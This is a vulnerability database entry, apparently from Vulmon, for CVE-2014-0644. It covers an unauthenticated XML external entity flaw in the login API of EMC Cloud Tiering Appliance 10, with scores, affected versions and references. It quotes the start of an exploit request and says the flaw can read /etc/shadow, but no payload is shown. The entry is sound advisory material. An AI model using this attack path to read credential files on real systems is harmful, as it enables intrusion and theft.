Published: 17/04/2014 Updated: 17/04/2014

CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10

VMScore: 785

Vector: AV:N/AC:L/Au:N/C:C/I:N/A:N

Subscribe to Cloud Tiering Appliance Software

EMC Cloud Tiering Appliance (CTA) 10 through SP1 allows remote malicious users to read arbitrary files via an api/login request containing an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, as demonstrated by reading the /etc/shadow file.

Vulnerable Product	Search on Vulmon	Subscribe to Product
emc cloud_tiering_appliance_software 10.0
emc cloud_tiering_appliance -

EMC Cloud Tiering Appliance v100 Unauthed XXE The following authentication request is susceptible to an XXE attack: POST /api/login HTTP/11 Host: 172311699 User-Agent: Mozilla/50 (X11; Ubuntu; Linux x86_64; rv:260) Gecko/20100101 Firefox/260 Accept: text/html,application/xhtml+xml,application/xml;q=09,*/*;q=08 Accept-Language: en-US,e ...

CWE-200 https://gist.github.com/brandonprry/9895721 http://seclists.org/fulldisclosure/2014/Mar/426 http://archives.neohapsis.com/archives/bugtraq/2014-04/0094.html https://nvd.nist.gov https://www.exploit-db.com/exploits/32623/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2014-0644

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect